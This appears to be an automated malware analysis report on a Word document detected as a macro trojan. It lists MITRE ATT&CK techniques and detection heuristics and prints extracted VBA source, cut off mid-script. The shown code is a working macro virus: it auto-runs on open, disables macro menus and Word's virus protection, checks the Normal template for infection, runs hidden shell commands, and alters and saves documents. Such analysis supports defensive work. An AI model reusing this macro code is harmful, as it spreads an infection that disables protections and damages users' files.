MALICIOUS
Risk Score: 220
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample contains VBA macros, including a Document_Open macro that uses the Shell() function for execution. This indicates an attempt to run arbitrary code, likely to download and execute a secondary payload. The ClamAV detection 'Doc.Trojan.Marker-42' further supports the malicious nature of the file.
Heuristics (5)
- ClamAV: Doc.Trojan.Marker-42 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Marker-42
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43028 bytes |

SHA-256: 58cfff28744de287b3bc96c5e0ada06cb0d1543a45e314d35226e80869dd5677

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'New Era of C&AVir. More Powerfull
On Error Resume Next
Dim Sw_Doc_Infec, Sw_Pln_Infec, Activa_Doc, Activa_Pln, Acci_Arch, Rompe As Boolean
Dim Dc, Pl As Object
Dim linwork, LCDoc, LCPln, parchi, pext, pext1, docum As String
Dim Accion1, Accion2, LinDoc, LinPln, Compara As Integer
Const cyav = "Este Es <C&AVir>"
Const pnomus = "***< C & A V i r >***"
'Inicializa Variables
Sw_Doc_Infec = False
Sw_Pln_Infec = False
Activa_Doc = True
Activa_Pln = False
CommandBars("Tools").Controls("Macro").Enabled = False
CommandBars("Tools").Controls("Macro").Visible = False
Options.VirusProtection = (1 - 1)
Options.SaveNormalPrompt = (1 - 1)
Options.ConfirmConversions = (1 - 1)
Options.CreateBackup = (1 - 1)
Set Dc = ActiveDocument.VBProject.VbComponents.Item(1)
Set Pl = NormalTemplate.VBProject.VbComponents.Item(1)
LinPln = Pl.CodeModule.Countoflines
LinDoc = Dc.CodeModule.Countoflines
Sw_Pln_Infec = Pl.CodeModule.Find(cyav, 1, 1, 10000, 10000)
Sw_Doc_Infec = Dc.CodeModule.Find(cyav, 1, 1, 10000, 10000)
Acci_Arch = False
Randomize
If Activa_Doc = True Then
If Date > 36433 Then
Dia = Day(Date)
If Dia = 1 Then
Ptp = Int(6 * Rnd)
Select Case Ptp
Case 1
Acci_Arch = True
pext = "*.doc"
pext1 = "1"
Case 2
Acci_Arch = True
pext = "*.bat"
pext1 = "2"
Case 3
Acci_Arch = True
pext = "*.sys"
pext1 = "3"
Case 4
Acci_Arch = False
pext = ""
pext1 = ""
Case 5
Acci_Arch = True
pext = "*.ini"
pext1 = "4"
End Select
If Acci_Arch = True Then
parchi = "IOBuff" & pext1 & ".vxd"
Shell "command.com /c dir \" & pext & "/s/b>>\" & parchi, vbHide
End If
End If
DiaSem = WeekDay(Date)
DiaSem = DiaSem + 3
Hacer = Int(DiaSem * Rnd)
If Hacer = Day(Now) Or (Hacer * 3) = Minute(Now) Then
Select Case Hacer
Case 1
Options.BlueScreen = True
Options.CheckGrammarAsYouType = False
Options.CheckSpellingAsYouType = False
ActiveDocument.ShowGrammaticalErrors = False
ActiveDocument.ShowSpellingErrors = False
ActiveDocument.CommandBars.LargeButtons = True
Application.ActiveWindow.DisplayVerticalScrollBar = False
Case 2
With ActiveDocument.PageSetup.LineNumbering
.Active = True
.StartingNumber = 3
.CountBy = 3
.RestartMode = wdRestartSection
End With
ActiveDocument.Save
If ActiveDocument.CommandBars.LargeButtons = True Then ActiveDocument.CommandBars.LargeButtons = False
ActiveDocument.ActiveWindow.Caption = ActiveDocument.ActiveWindow.Caption & " - Pura Basura!!"
If ActiveDocument.Saved = False Then ActiveDocument.Save
Case 3
With ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary).PageNumbers
.NumberStyle = wdPageNumberStyleLowercaseRoman
.IncludeChapterNumber = True
.RestartNumberingAtSection = True
.StartingNumber = 99
.Add PageNumberAlignment:=wdAlignPageNumberCenter, FirstPage:=True
End With
Application.ActiveWindow.DisplayHorizontalScrollBar = False
Application.ActiveWindow.DisplayVerticalScrollBar = False
If ActiveDocument.Saved = False Then ActiveDocument.Save
If Options.BlueScreen = True Then Options.BlueScreen
... (truncated)